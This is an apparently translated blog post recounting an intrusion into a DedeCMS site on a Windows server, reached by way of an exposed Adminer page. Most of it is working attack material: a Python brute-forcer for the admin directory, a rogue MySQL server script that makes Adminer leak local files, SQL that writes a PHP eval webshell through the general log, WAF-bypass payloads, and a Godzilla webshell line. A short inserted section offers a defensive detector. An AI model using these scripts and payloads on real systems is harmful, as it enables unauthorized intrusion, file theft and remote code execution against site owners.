Notes on a Chance Encounter with Adminer
Another boring day. I fired up the high-risk vulnerability scanner and let it run, but it turned up nothing, so I started the tedious job of looking at sites one by one. Then I found the site below: DedeCMS, on a Windows server.
I tried every historical vulnerability and none of them worked. Since the server is Windows, this script can be used to brute-force the backend (admin) directory:
```python
import itertools
import requests

characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#"
back_dir = ""
flag = 0
url = "http://www.test.com/tags.php"
data = {
    "_FILES[mochazz][tmp_name]": "./{p}<</images/adminico.gif",
    "_FILES[mochazz][name]": 0,
    "_FILES[mochazz][size]": 0,
    "_FILES[mochazz][type]": "image/gif",
}

# Phase 1: find the first characters of the backend directory name
for num in range(1, 7):
    if flag:
        break
    for pre in itertools.permutations(characters, num):
        pre = ''.join(list(pre))
        data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=pre)
        print("testing", pre)
        r = requests.post(url, data=data)
        if "Upload filetype not allow !" not in r.text and r.status_code == 200:
            flag = 1
            back_dir = pre
            data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
            break
        else:
            data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"

print("[+] 前綴為:", back_dir)
flag = 0

# Phase 2: extend the found prefix one character at a time
for i in range(30):
    if flag:
        break
    for ch in characters:
        if ch == characters[-1]:
            flag = 1
            break
        data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=back_dir + ch)
        r = requests.post(url, data=data)
        if "Upload filetype not allow !" not in r.text and r.status_code == 200:
            back_dir += ch
            print("[+] ", back_dir)
            data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
            break
        else:
            data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"

print("后臺(tái)地址為:", back_dir)
```
After it finished, the result was, of all things, dede, which makes no sense, because visiting dede gives a 404.
If you do find the backend, you can also use this trick to guess the administrator username:
http://www.yulegeyu.com/2018/09/20/dedecms-guess-admin-username-trick/
At a dead end, I casually tried adminer.php and it actually existed (the scanner's wordlist does include adminer.php; I guess it scanned too many directories and got its IP banned, so don't trust the scanner).
Older Adminer versions can be abused via a malicious MySQL server that reads files from the connecting client.
mysql_client.py code:
```python
# coding=utf-8
import logging
import socket
import sys

logging.basicConfig(level=logging.DEBUG)
filename = sys.argv[1]

sv = socket.socket()
sv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sv.bind(("", 3306))
sv.listen(5)
conn, address = sv.accept()
logging.info('Conn from: %r', address)
# Server greeting packet (protocol 10, version "5.5.53", mysql_native_password)
conn.sendall(b"\x4a\x00\x00\x00\x0a\x35\x2e\x35\x2e\x35\x33\x00\x17\x00\x00\x00\x6e\x7a\x3b\x54\x76\x73\x61\x6a\x00\xff\xf7\x21\x02\x00\x0f\x80\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x76\x21\x3d\x50\x5c\x5a\x32\x2a\x7a\x49\x3f\x00\x6d\x79\x73\x71\x6c\x5f\x6e\x61\x74\x69\x76\x65\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x00")
conn.recv(9999)
logging.info("auth okay")
# OK packet answering the client's login attempt
conn.sendall(b"\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00")
conn.recv(9999)
logging.info("want file...")
# LOCAL INFILE request: 3-byte length, sequence id 1, 0xFB, filename
wantfile = bytes([len(filename) + 1]) + b"\x00\x00\x01\xFB" + filename.encode()
conn.sendall(wantfile)
content = conn.recv(9999)
logging.info(content)
conn.close()
```
Usage: run it directly on your server:
```shell
python mysql_client.py "F:\dede\index.php"
```
Then in Adminer enter your server's address, fill in any username and password, and connect; the file is read. Port 3306 on your server must be reachable from outside.
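The file read above works because the server sends a LOCAL INFILE request (payload tag 0xFB) that the client never asked for. As an added example (not from the original post), here is a defender-side check that parses a captured MySQL session and flags exactly that; the sample packets are constructed, with the server packet built the same way mysql_client.py builds it.

```python
# Added example (not from the original post): flag a MySQL server that answers an
# ordinary query with a LOCAL INFILE request (payload tag 0xFB). A legitimate
# server sends 0xFB only after the client issued LOAD DATA LOCAL INFILE; a rogue
# server sends it unprompted so the client uploads an arbitrary local file.
# The sample session at the bottom is constructed for illustration.

COM_QUERY = 0x03             # first payload byte of a client query packet
LOCAL_INFILE_REQUEST = 0xFB  # first payload byte of a server "send me this file" packet


def split_packets(stream: bytes):
    """Split a raw MySQL byte stream into (sequence_id, payload) tuples.
    Wire format: 3-byte little-endian payload length, 1-byte sequence id, payload.
    """
    packets, pos = [], 0
    while pos + 4 <= len(stream):
        length = int.from_bytes(stream[pos:pos + 3], "little")
        payload = stream[pos + 4:pos + 4 + length]
        if len(payload) != length:
            break  # truncated packet: stop rather than misparse
        packets.append((stream[pos + 3], payload))
        pos += 4 + length
    return packets


def find_rogue_infile(session):
    """session: list of (direction, raw_bytes) with direction 'c2s' or 's2c'.
    Returns the filenames the server requested without a preceding
    LOAD DATA LOCAL INFILE query from the client.
    """
    last_query, findings = b"", []
    for direction, raw in session:
        for _seq, payload in split_packets(raw):
            if not payload:
                continue
            if direction == "c2s" and payload[0] == COM_QUERY:
                last_query = payload[1:].strip().upper()
            elif direction == "s2c" and payload[0] == LOCAL_INFILE_REQUEST:
                if not last_query.startswith(b"LOAD DATA LOCAL INFILE"):
                    findings.append(payload[1:].decode("utf-8", "replace"))
    return findings


# Constructed sample: client sends "select 1"; the server replies with the exact
# packet shape the post's mysql_client.py builds (len+1, seq 1, 0xFB, filename).
FILENAME = b"F:\\dede\\index.php"
SAMPLE_SESSION = [
    ("c2s", bytes([9, 0, 0, 0, COM_QUERY]) + b"select 1"),
    ("s2c", bytes([len(FILENAME) + 1, 0, 0, 1, LOCAL_INFILE_REQUEST]) + FILENAME),
]
```

On the client side the capability itself can be switched off: the MySQL client library honours the `local_infile` setting (`--local-infile=0` for the command-line client), and a client with it disabled refuses the 0xFB request regardless of what the server sends.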
Then it was back to reading files: first read an arbitrary path so the error message reveals the web root.
Since it is DedeCMS, read data\common.inc.php directly.
File not found? Try it directly under the F: drive.
The account turned out to be root, so log in to adminer.php directly and get a shell through the log.
```sql
set global general_log=on;                           -- enable general log mode
set global general_log_file='F:\\*****\\shell.php';  -- set the log file path
select '<?php eval($_POST['pwd']);?>';               -- write the shell
```
Unsurprisingly, the last one was blocked here, so capture the request and test: select '<?php ' is not blocked.
select+'<?php+phpinfo();+?>' is blocked.
Bypass it with a comment followed by a newline: select+'<?php+//%0Aphpinfo();+?>'
Write a Godzilla (哥斯拉) webshell:
select '<?php //"%0A$a="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";eval%01(base64_decode%01($a));//"; ?>'
Connected successfully, running as system.
Summary